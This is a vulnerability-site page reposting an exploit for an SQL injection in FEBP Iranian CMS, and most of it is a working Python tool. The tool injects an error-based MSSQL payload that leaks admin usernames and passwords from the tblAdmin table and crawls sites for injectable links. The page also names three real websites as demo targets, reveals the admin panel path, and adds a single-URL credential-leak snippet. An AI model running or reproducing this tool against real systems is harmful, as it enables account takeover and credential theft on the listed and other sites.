FEBP IRANIAN CMS SQL injection - CXSecurity.com

Vulnerability ID 1867054    Vulnerability type
Published 2019-12-19    Updated 2019-12-19
CVE ID N/A    CNNVD-ID N/A
Platform N/A    CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019120086
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit (EXP)
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: FEBP IRANIAN CMS SQL injection
# Date: 2019-12-17
# Exploit Author: S I R M A X
# Vendor Homepage: http://febpco.ir
# Category: webapps
# Version: All versions
# Tested on: Windows 10, Linux (Ubuntu)
#=================================================================================#
Demo :

[-] http://daneshir.ir
[-] http://www.mehregancorp.com
[-] http://www.monifano.com
#=================================================================================#
[+] Exploit:

#!/usr/bin/python3.8
from bs4 import BeautifulSoup
from colorama import Fore, init
import os
import requests
import threading
from urllib import parse
import random
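# Error-based MSSQL injection string (URL-encoded). Decoded it reads:
#   and 1=(select username_Admin+':::'+password_Admin as t from tblAdmin for xml path(''))-- -
# FOR XML PATH('') concatenates every tblAdmin row into one string; comparing it
# to the integer 1 raises a conversion error that leaks the username:::password
# pairs into the page's <title>, which the code below parses.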
payload = '%20and%201=(select%20username_Admin%2b%27:::%27%2bpassword_Admin%20as%20t+from%20tblAdmin%20for%20xml%20path(%27%27))--%20-'
max_threads = 10
if os.name == 'nt':
    init(convert=True)


def clear():
    if os.name == 'nt':
        os.system('cls')
    else:
        os.system('clear')


def check_links(link):
    return link not in used_links


def scan(link, main_url):
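    # Crawl helper for one <a> tag: links that carry a query string get the
    # injection payload appended and count as a hit when ':::' shows up in the
    # response title; plain links are fetched and mined for further <a> tags.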
    global current_threads
    if 'http' in (link_href := link.get('href', '')):
        if main_url in link_href:
            current_url = link_href
        else:
            current_threads -= 1
            return
    else:
        current_url = main_url + link_href
    if '=' in current_url:
        parsed_url = parse.urlparse(current_url)
        clean_url = main_url.strip('/') + parsed_url.path + '?' + parsed_url.query + payload
        try:
            new_link = BeautifulSoup(requests.get(clean_url).text, 'html.parser')
        except Exception as link_error:
            print(Fore.YELLOW + str(link_error))
        else:
            if (current_title := new_link.title) is not None and ':::' in current_title.text:
                hits.add(clean_url.replace(payload, ''))
    else:
        try:
            all_new_links = BeautifulSoup(requests.get(current_url).text, 'html.parser').find_all('a')
        except Exception as link_error:
            print(Fore.YELLOW + str(link_error))
        else:
            new_links = filter(check_links, all_new_links)
            all_links.extend(new_links)
    current_threads -= 1


clear()
print(
    '''####### ####### ######  ######
#       #       #     # #     #
#       #       #     # #     #
#####   #####   ######  ######
#       #       #     # #
#       #       #     # #
#       ####### ######  #

#    #    ###   #       #       ####### ######
#   #      #    #       #       #       #     #
#  #       #    #       #       #       #     #
###        #    #       #       #####   ######
#  #       #    #       #       #       #   #
#   #      #    #       #       #       #    #
#    #    ###   ####### ####### ####### #     #
'''
)
print(Fore.RED + 'Welcome to FEBP Killer Exploit !\nExploited By S I R M A X & AntiWanted\n')
while True:
    print(Fore.GREEN + '1 : Exploit !\n2 : Admin Page\n3 : Scanner (It\'s better to find them yourself !)\n4 : Exit !')
    option = input(Fore.RED + 'Please select an option : ')
    clear()
    if option == '1':
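        # Option 1: append the injection payload to a user-supplied URL and
        # pull the leaked username:::password pairs out of the page title.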
        payload_url = input(Fore.CYAN + 'Please enter target URL : ') + payload
        try:
            title_data = BeautifulSoup(requests.get(payload_url).text, 'html.parser').title.text.split('\'')
        except Exception as error:
            print(Fore.YELLOW + str(error))
        else:
            if len(title_data) == 3 and ':::' in title_data[1]:
                raw_users = title_data[1].split('</t>')[:-1]
                users = [data.strip('<t>').replace(':::', ' => ') for data in raw_users]
                for user in users:
                    print(Fore.YELLOW + user)
            else:
                print(Fore.YELLOW + 'URL is not vulnerable !')
    elif option == '2':
        website = input(Fore.CYAN + 'Please enter website URL : ').strip('/') + '/inputtopanelmanager.aspx'
        print(Fore.GREEN + 'Admin panel => ' + Fore.YELLOW + website)
    elif option == '3':
        website_url = input(Fore.GREEN + 'Please enter website URL : ').strip('/') + '/'
        try:
            all_links = BeautifulSoup(requests.get(website_url).text, 'html.parser').find_all('a')
        except Exception as error:
            print(Fore.YELLOW + str(error))
        else:
            print(Fore.RED + 'Scanning ...')
            hits = set()
            used_links = []
            current_threads = 0
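            # Crude thread pool: pull random links off the queue and scan each
            # in its own thread, never running more than max_threads at once,
            # then busy-wait until every worker has decremented current_threads.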
            while all_links:
                if current_threads + 1 <= len(all_links) and current_threads + 1 <= max_threads:
                    current_threads += 1
                    random_choice = random.choice(all_links)
                    threading.Thread(target=scan, args=(random_choice, website_url)).start()
                    all_links.remove(random_choice)
                    used_links.append(random_choice)
            while current_threads != 0:
                continue
            for hit in hits:
                print(Fore.CYAN + 'Got a hit : ' + hit)
    elif option == '4':
        print(Fore.MAGENTA + 'Cya !')
        break
    else:
        print(Fore.BLUE + 'Unknown option !')
    input(Fore.RED + 'Press Enter to continue ...')
    clear()
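
For reference, a minimal single-URL check built on the same payload might look like the sketch below; the target address and its id parameter are placeholders, not taken from the advisory:

#!/usr/bin/python3.8
from bs4 import BeautifulSoup
import requests

# Same encoded error-based payload used by the exploit above.
payload = '%20and%201=(select%20username_Admin%2b%27:::%27%2bpassword_Admin%20as%20t+from%20tblAdmin%20for%20xml%20path(%27%27))--%20-'
target = 'http://example.com/page.aspx?id=1'  # placeholder: any parameterised FEBP URL

# A vulnerable page echoes the username:::password pairs into its <title>.
title = BeautifulSoup(requests.get(target + payload).text, 'html.parser').title
if title is not None and ':::' in title.text:
    print('Leaked credentials:', title.text)
else:
    print('No ::: marker in the response title.')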

#=================================================================================#
[=] T.me/Sir_Max
[=] Telegram Channel ==> @Storm_Security
#=================================================================================#